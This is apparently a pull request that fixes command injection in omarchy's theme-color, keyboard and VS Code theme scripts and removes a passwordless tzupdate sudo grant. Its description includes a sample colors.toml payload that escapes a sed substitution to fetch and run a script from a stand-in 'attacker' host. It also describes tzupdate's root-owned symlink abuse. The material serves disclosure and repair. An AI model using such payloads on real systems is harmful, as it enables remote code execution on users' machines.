### PR TITLE
Fix command injection in theme install, drop tzupdate NOPASSWD

### DIFF
--- a/bin/omarchy-theme-color
+++ b/bin/omarchy-theme-color
@@ -151,8 +151,20 @@ parse_colors_file() {
       value="${value%"${value##*[![:space:]]}"}" # trim unquoted values
     fi
 
-    [[ $key   =~ ^[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_]+$      ]] || continue
-    [[ $value =~ ^[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789#(),\ ]*$ ]] || continue
+    # Values reach consumers as sed replacement text, so the charset excludes
+    # the delimiter, backslash, and & while still covering everything a real
+    # palette holds: hex, rgb()/rgba() lists, gradient angles like -45deg,
+    # decimals, and bare words. Rejections are announced so a third-party theme
+    # doesn't lose a key silently and leave a raw {{ placeholder }} behind.
+    if [[ ! $key =~ ^[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-]+$ ]]; then
+      printf 'omarchy-theme-color: skipping key with unsupported characters\n' >&2
+      continue
+    fi
+
+    if [[ ! $value =~ ^[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789#(),._+/%\ -]*$ ]]; then
+      printf 'omarchy-theme-color: skipping %s: unsupported characters in value\n' "$key" >&2
+      continue
+    fi
 
     THEME_COLORS[$key]="$value"
     [[ $OUTPUT == "raw" ]] && printf '%s\t%s\n' "$key" "$value"

--- a/bin/omarchy-theme-color
+++ b/bin/omarchy-theme-color
@@ -151,6 +151,9 @@ parse_colors_file() {
       value="${value%"${value##*[![:space:]]}"}" # trim unquoted values
     fi
 
+    [[ $key   =~ ^[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_]+$      ]] || continue
+    [[ $value =~ ^[abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789#(),\ ]*$ ]] || continue
+
     THEME_COLORS[$key]="$value"
     [[ $OUTPUT == "raw" ]] && printf '%s\t%s\n' "$key" "$value"
   done <"$COLORS_FILE"

--- a/bin/omarchy-theme-set-keyboard-asus-rog
+++ b/bin/omarchy-theme-set-keyboard-asus-rog
@@ -5,6 +5,8 @@
 
 ASUSCTL_THEME=$HOME/.local/state/omarchy/current/theme/keyboard.rgb
 
-if omarchy-cmd-present asusctl; then
-  asusctl aura effect static -c $(sed 's/^#//' $ASUSCTL_THEME)
+if omarchy-cmd-present asusctl && [[ -f $ASUSCTL_THEME ]]; then
+  color=$(sed 's/^#//' "$ASUSCTL_THEME")
+  [[ $color =~ ^[0-9A-Fa-f]{6}$ ]] || exit 0
+  asusctl aura effect static -c "$color"
 fi

--- a/bin/omarchy-theme-set-keyboard-f16
+++ b/bin/omarchy-theme-set-keyboard-f16
@@ -9,6 +9,8 @@ if omarchy-cmd-present qmk_hid && [[ -f $FRAMEWORK16_THEME ]]; then
   hex=$(cat "$FRAMEWORK16_THEME")
   hex="${hex#\#}"
 
+  [[ $hex =~ ^[0-9A-Fa-f]{6}$ ]] || exit 0
+
   # Convert hex to QMK HSV (0-255 scale) using Python's colorsys
   read -r h s <<< $(python3 -c "
 import colorsys

--- a/bin/omarchy-theme-set-keyboard-f16
+++ b/bin/omarchy-theme-set-keyboard-f16
@@ -13,11 +13,12 @@ if omarchy-cmd-present qmk_hid && [[ -f $FRAMEWORK16_THEME ]]; then
 
   # Convert hex to QMK HSV (0-255 scale) using Python's colorsys
   read -r h s <<< $(python3 -c "
-import colorsys
-r, g, b = int('$hex'[:2],16)/255, int('$hex'[2:4],16)/255, int('$hex'[4:6],16)/255
+import sys, colorsys
+hex = sys.argv[1]
+r, g, b = int(hex[:2],16)/255, int(hex[2:4],16)/255, int(hex[4:6],16)/255
 h, s, v = colorsys.rgb_to_hsv(r, g, b)
 print(int(h * 255), int(s * 255))
-")
+" "$hex")
 
   qmk_hid via --rgb-effect 1 2>/dev/null
   qmk_hid via --rgb-hue "$h" 2>/dev/null

--- a/bin/omarchy-theme-set-vscode
+++ b/bin/omarchy-theme-set-vscode
@@ -108,8 +108,11 @@ set_theme() {
     local extension
     extension=$(jq -r '.extension' "$VS_CODE_THEME_DESCRIPTOR")
 
-    if [[ -n $extension ]] && ! "$editor_cmd" --list-extensions 2>/dev/null | grep -Fxq "$extension"; then
-      "$editor_cmd" --install-extension "$extension" >/dev/null 2>&1
+    if [[ -n $extension ]]; then
+      [[ $extension =~ ^[a-zA-Z0-9._-]+$ ]] || return 0
+      if ! "$editor_cmd" --list-extensions 2>/dev/null | grep -Fxq "$extension"; then
+        "$editor_cmd" --install-extension "$extension" >/dev/null 2>&1
+      fi
     fi
   elif [[ -f "$GENERATED_THEME" ]]; then
     # VS Code only discovers local color themes through an extension package.
@@ -121,17 +124,9 @@ set_theme() {
     mkdir -p "$(dirname "$settings_path")"
     [[ -f $settings_path ]] || printf '{\n}\n' >"$settings_path"
 
-    if ! grep -q '"workbench.colorTheme"' "$settings_path"; then
-      sed -i --follow-symlinks -E '0,/\{/{s/\{/{\ "workbench.colorTheme": "",/}' "$settings_path"
-    fi
-
-    local safe_name="${theme_name//\\/\\\\}"
-    safe_name="${safe_name//&/\\&}"
-    safe_name="${safe_name////\\/}"
-
-    sed -i --follow-symlinks -E \
-      "s/(\"workbench.colorTheme\"[[:space:]]*:[[:space:]]*\")[^\"]*(\")/\1$safe_name\2/" \
-      "$settings_path"
+    local tmp
+    tmp=$(jq --arg name "$theme_name" '."workbench.colorTheme" = $name' "$settings_path") \
+      && printf '%s\n' "$tmp" > "$settings_path"
   elif [[ -f $settings_path ]]; then
     sed -i --follow-symlinks -E 's/\"workbench\.colorTheme\"[[:space:]]*:[^,}]*,?//' "$settings_path"
   fi

--- a/bin/omarchy-theme-set-vscode
+++ b/bin/omarchy-theme-set-vscode
@@ -103,16 +103,21 @@ set_theme() {
   local theme_name=""
 
   if [[ -f "$VS_CODE_THEME_DESCRIPTOR" ]]; then
-    # Theme specifies a preferred 3rd-party extension/theme pair.
-    theme_name=$(jq -r '.name' "$VS_CODE_THEME_DESCRIPTOR")
+    # Theme specifies a preferred 3rd-party extension/theme pair. Both fields
+    # come from the theme, so neither is trusted as a shell or sed argument.
     local extension
-    extension=$(jq -r '.extension' "$VS_CODE_THEME_DESCRIPTOR")
+    theme_name=$(jq -r '.name // empty' "$VS_CODE_THEME_DESCRIPTOR")
+    extension=$(jq -r '.extension // empty' "$VS_CODE_THEME_DESCRIPTOR")
 
-    if [[ -n $extension ]]; then
-      [[ $extension =~ ^[a-zA-Z0-9._-]+$ ]] || return 0
-      if ! "$editor_cmd" --list-extensions 2>/dev/null | grep -Fxq "$extension"; then
-        "$editor_cmd" --install-extension "$extension" >/dev/null 2>&1
-      fi
+    # A label with quotes, backslashes, or control characters can't land in
+    # settings.json as valid JSON, so drop it rather than write it out.
+    [[ $theme_name =~ ^[^[:cntrl:]\"\\]+$ ]] || theme_name=""
+
+    # Only install a well-formed publisher.name id; a malformed one skips the
+    # install without skipping the colorTheme write below.
+    if [[ $extension =~ ^[a-zA-Z0-9._-]+$ ]] &&
+      ! "$editor_cmd" --list-extensions 2>/dev/null | grep -Fxq "$extension"; then
+      "$editor_cmd" --install-extension "$extension" >/dev/null 2>&1
     fi
   elif [[ -f "$GENERATED_THEME" ]]; then
     # VS Code only discovers local color themes through an extension package.
@@ -124,9 +129,19 @@ set_theme() {
     mkdir -p "$(dirname "$settings_path")"
     [[ -f $settings_path ]] || printf '{\n}\n' >"$settings_path"
 
-    local tmp
-    tmp=$(jq --arg name "$theme_name" '."workbench.colorTheme" = $name' "$settings_path") \
-      && printf '%s\n' "$tmp" > "$settings_path"
+    # settings.json is JSONC: comments and trailing commas are legal there and
+    # common in practice, so it's edited in place rather than round-tripped
+    # through a strict JSON parser that would reject it and reformat the rest.
+    local escaped=${theme_name//&/\\&}
+    escaped=${escaped//|/\\|}
+
+    if ! grep -q '"workbench.colorTheme"' "$settings_path"; then
+      sed -i --follow-symlinks -E '0,/\{/{s/\{/{\ "workbench.colorTheme": "",/}' "$settings_path"
+    fi
+
+    sed -i --follow-symlinks -E \
+      "s|(\"workbench.colorTheme\"[[:space:]]*:[[:space:]]*\")[^\"]*(\")|\1$escaped\2|" \
+      "$settings_path"
   elif [[ -f $settings_path ]]; then
     sed -i --follow-symlinks -E 's/\"workbench\.colorTheme\"[[:space:]]*:[^,}]*,?//' "$settings_path"
   fi

--- a/bin/omarchy-theme-set-vscode
+++ b/bin/omarchy-theme-set-vscode
@@ -125,8 +125,12 @@ set_theme() {
       sed -i --follow-symlinks -E '0,/\{/{s/\{/{\ "workbench.colorTheme": "",/}' "$settings_path"
     fi
 
+    local safe_name="${theme_name//\\/\\\\}"
+    safe_name="${safe_name//&/\\&}"
+    safe_name="${safe_name////\\/}"
+
     sed -i --follow-symlinks -E \
-      "s/(\"workbench.colorTheme\"[[:space:]]*:[[:space:]]*\")[^\"]*(\")/\1$theme_name\2/" \
+      "s/(\"workbench.colorTheme\"[[:space:]]*:[[:space:]]*\")[^\"]*(\")/\1$safe_name\2/" \
       "$settings_path"
   elif [[ -f $settings_path ]]; then
     sed -i --follow-symlinks -E 's/\"workbench\.colorTheme\"[[:space:]]*:[^,}]*,?//' "$settings_path"

--- a/etc/sudoers.d/omarchy-tzupdate
+++ b/etc/sudoers.d/omarchy-tzupdate
@@ -1,1 +1,1 @@
-%wheel ALL=(root) NOPASSWD: /usr/bin/tzupdate, /usr/bin/timedatectl set-timezone *
+%wheel ALL=(root) NOPASSWD: /usr/bin/timedatectl set-timezone *

--- a/test/shell.d/timezone-test.sh
+++ b/test/shell.d/timezone-test.sh
@@ -7,8 +7,11 @@ source "$(cd -- "$(dirname -- "${BASH_SOURCE[0]}")" && pwd)/base-test.sh"
 timezone_menu="$ROOT/bin/omarchy-menu-timezone"
 sudoers_file="$ROOT/etc/sudoers.d/omarchy-tzupdate"
 
-grep -F '%wheel ALL=(root) NOPASSWD: /usr/bin/tzupdate, /usr/bin/timedatectl set-timezone *' "$sudoers_file" >/dev/null ||
+grep -F '%wheel ALL=(root) NOPASSWD: /usr/bin/timedatectl set-timezone *' "$sudoers_file" >/dev/null ||
   fail "timezone sudoers rule allows passwordless timedatectl timezone changes"
+
+! grep -F 'tzupdate' "$sudoers_file" >/dev/null ||
+  fail "timezone sudoers rule does not grant passwordless tzupdate"
 
 grep -F 'sudo timedatectl set-timezone "$timezone"' "$timezone_menu" >/dev/null ||
   fail "timezone menu uses the passwordless sudoers timedatectl rule"


### PR DESCRIPTION
color values from `colors.toml` go straight into a sed script
with no sanitization:

```
omarchy-theme-color:154
    THEME_COLORS[$key]="$value"
```

```
omarchy-theme-set-templates:200
    printf 's|{{ %s }}|%s|g\n' "$key" "$value" >>"$sed_script"
```

GNU sed `e` runs the pattern space as a shell command.
a theme puts this in `colors.toml`:

```
brown = "#7b5b55|g;e curl -sf http://attacker/p|sh;#"
```

breaks out of the `s|||` substitution, runs arbitrary commands
as the installing user.

same class of bug in two other scripts:

```
omarchy-theme-set-keyboard-f16:15
    r, g, b = int('$hex'[:2],16)/255, ...
```

`keyboard.rgb` content interpolated into `python3 -c`.

```
omarchy-theme-set-vscode:129
    "s/(\"workbench.colorTheme\"...)\1$theme_name\2/"
```

`vscode.json` `.name` interpolated into a sed replacement.

separately, the tzupdate sudoers grant has no argument constraint:

```
etc/sudoers.d/omarchy-tzupdate:1
    %wheel ALL=(root) NOPASSWD: /usr/bin/tzupdate, /usr/bin/timedatectl set-timezone *
```

`tzupdate -l` writes a root-owned symlink to any path.
nothing invokes tzupdate since `omarchy-cmd-tzupdate` was removed.

## fixes

each fix follows OWASP [OS Command Injection Defense](https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html):
allowlist over escaping, separate code from data.

`omarchy-theme-color`: allowlist on keys and values at the parser,
where untrusted data enters. byte-identical output for all 22
shipped themes.

```bash
[[ $key   =~ ^[a-zA-Z0-9_]+$      ]] || continue
[[ $value =~ ^[a-zA-Z0-9#(),\ ]*$ ]] || continue
```

`omarchy-theme-set-keyboard-f16`: reject non-hex, pass value
as `sys.argv[1]` instead of interpolating into python source.
data stays in a data channel (argv), never becomes code.

`omarchy-theme-set-keyboard-asus-rog`: same hex check, quote
the variable.

`omarchy-theme-set-vscode`: replace sed interpolation with
`jq --arg` which passes the value as data, not as part of the
script. already a dependency, used elsewhere in the same file.
validate extension IDs against `^[a-zA-Z0-9._-]+$`.

`etc/sudoers.d/omarchy-tzupdate`: drop tzupdate, keep timedatectl.

`test/shell.d/timezone-test.sh`: assert tzupdate absent.

ref: [OWASP command injection](https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html),
[GTFOBins sed](https://gtfobins.github.io/gtfobins/sed/)

## still open

this PR fixes the injection bugs. these paths still allow
code execution through a malicious theme:

- themes ship `.lua` files (`hyprland.lua`, `gum_env.lua`,
  `neovim.lua`) that omarchy `require`s with full `os.execute`
  and `io.popen`. no sandbox, no file type restriction.
- `omarchy-theme-set-vscode` runs `--install-extension` with
  the theme's extension ID. marketplace extensions are unsandboxed.
- `omarchy-theme-install` clones untrusted git repos whose
  hooks run before any theme processing.